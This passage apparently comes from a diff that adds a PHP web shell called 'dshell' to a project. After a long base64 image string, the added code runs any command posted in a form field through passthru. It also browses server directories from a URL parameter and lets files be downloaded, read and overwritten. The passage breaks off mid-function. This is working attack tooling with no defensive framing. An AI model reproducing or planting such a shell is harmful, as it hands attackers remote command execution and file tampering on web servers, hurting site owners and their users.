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","download" => "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", "edit" => "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=");
+
+//This function sends the appropriate headers to handle the image (This is just GIF images easily modifiable
+if (isset($_GET['img']))
+{
+header("Content-type: image/gif");
+echo base64_decode($images[$_GET['img']]);
+die();
+}
+//Sets the directory to the directory specified
+if (isset($_GET['dir']))
+{
+	$current_dir = realpath($_GET['dir'])."/";
+}
+else
+{
+	$current_dir = './';
+}
+
+//Run a CLI command if one has been sent
+if (isset($_POST['CLICommand']))
+{
+	echo "<pre>";
+	echo "<b>Output From Command: </b><br />";
+	echo "<textarea cols='120' rows='25'>";
+	passthru($_POST['CLICommand']);
+	echo "</textarea>";
+	echo "</pre>";
+	die();
+}
+
+//set the current_dir url
+if (($current_dir == './') && (!isset($_COOKIE['dshell'])))
+{
+	$surl = $_SERVER['REQUEST_URI'];
+	setcookie('dshell',$surl,time()+99999);
+}
+elseif (!isset($_COOKIE['dshell']))
+	die('Error Could Not load the default path');
+else
+	$surl = $_COOKIE['dshell'];
+	
+function scan_dir($current_dir)
+{
+$chemin=$current_dir;
+if (glob("$chemin*"))
+{
+$files = glob("$chemin*");
+$fileListing = "";
+foreach ($files as $filename) {
+	  $fileListing .= "$filename-<";
+   }
+   $listing = explode('-<',$fileListing);
+   return $listing;
+ }
+ else
+ {
+	die("Couldn't Read directory, Blocked!!!");
+ }
+}
+
+//The majority of this function was taken off of php.net, no use reinventing the wheel when this works very well :p
+//Anyway this function gets the permssions in rwx form thats read write execute format.
+function perms_check($file)
+{
+	$perms = fileperms($file);
+
+if (($perms & 0xC000) == 0xC000) {
+    // Socket
+    $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+    // Symbolic Link
+    $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+    // Regular
+    $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+    // Block special
+    $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+    // Directory
+    $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+    // Character special
+    $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+    // FIFO pipe
+    $info = 'p';
+} else {
+    // Unknown
+    $info = 'u';
+}
+
+// Owner
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+            (($perms & 0x0800) ? 's' : 'x' ) :
+            (($perms & 0x0800) ? 'S' : '-'));
+
+// Group
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+            (($perms & 0x0400) ? 's' : 'x' ) :
+            (($perms & 0x0400) ? 'S' : '-'));
+
+// World
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+            (($perms & 0x0200) ? 't' : 'x' ) :
+            (($perms & 0x0200) ? 'T' : '-'));
+
+	return $info;
+}
+
+
+//Function to display the files in the current_dir variable
+function dir_scan($current_dir) {
+$output="<tr><td><font color='red'>Filename</font></td><td><font color='red'>Permissions</font></td><td><font color='red'>Actions</font></td></tr>\n
+<tr><td><a href='?dir=".$current_dir."./'>.</a></td></tr>\n
+<tr><td><a href='?dir=".$current_dir."../'>..</a></td></tr>";
+$output_left="";
+foreach(scan_dir($current_dir) as $item) 
+{
+	if ($item == "." || $item == "..")
+	{
+		$item = str_replace($current_dir,"",$item);
+		$output .= "<tr><td width='90%'>".
+	"<a href='".$item."'>".$item."</a>".
+	"</td><td>".
+	"</td></tr>";
+	
+	}
+	else
+	{
+	if ($item == "")
+	{ }
+	else
+	{
+	if (is_dir($item))
+	{
+		$perms = perms_check($item);
+		$item = str_replace($current_dir,"",$item);
+		$output .="<tr><td width='90%'>"."<a href='?dir=".$current_dir.$item."/'>".$item."</a></td><td width='10%'>$perms</td><td>&nbsp&nbsp</td></tr>";
+	}
+	else
+	{
+	$perms = perms_check($item);
+	$item = str_replace($current_dir,"",$item);
+		$output_left .= "<tr><td width='90%'>".
+	"<a href='".$item."'>".$item."</a>".
+	"</td><td width='10%'>$perms</td><td>".
+	"<a href='?action=download&file=".$current_dir.$item."'><img src='".$surl."?img=download' border='0'></a><a href='".$surl."?action=edit&file=".$current_dir.$item."'><img src='".$surl."?img=edit' border='0'></a><br />".
+	"</td></tr>";
+	}
+	}
+	}
+}
+	$output .=$output_left;
+	return $output;
+}
+
+//Edit File Function, $mode can be r(read) w(write)
+//Content is needed only if writing
+function fedit($fileLocale,$mode,$content = "")
+{
+	if ($mode == "r")
+	{
+		$output = htmlspecialchars(file_get_contents($fileLocale));
+		return $output;
+	}
+	elseif ($mode == "w")
+	{
+		if ($content == "")
+			echo("Error No Content Provided!");
+		else {
+		$file = fopen($fileLocale,"w");
+		if (fwrite($file,stripslashes($content)))
+		{
+			$value = 1;
+		}
+		else 
+			$value = 0;
+		fclose($file);
+		return $value;
+		}
+	}
+}
+
+//Function for showing the edit page.
+function edit($file)
+{
+	return "<tr><td><center><form action='".$surl."?action=write&file=".$_GET['file']."' method='post'>
